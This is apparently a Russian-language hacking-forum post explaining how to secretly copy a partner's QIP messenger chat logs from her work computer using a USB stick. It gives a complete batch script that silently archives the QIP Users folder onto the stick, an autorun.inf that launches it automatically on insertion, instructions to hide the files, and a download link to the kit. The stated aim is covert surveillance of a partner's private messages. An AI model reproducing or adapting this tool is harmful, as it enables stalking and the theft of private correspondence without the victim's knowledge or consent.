ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Один мой знакомый перестал доверять своей второй половине и уж очень захотел узнать о чем она грустит просиживая целые дни в асе (в даном случае QIP).И вроде бы все предельно просто, но одно но, комп с которого она переписывалась у нее на работе .

Пораскинув извилинами понял что трояны и прочее... врядли пройдет номер. Решыл сделать это потихому с помощью USB Flash...
Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом


@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul



где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul


2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"


3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


4 Создаем папку с названием 123


5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится


DOWNLOAD
http://depositfiles.com/files/7ux99kilp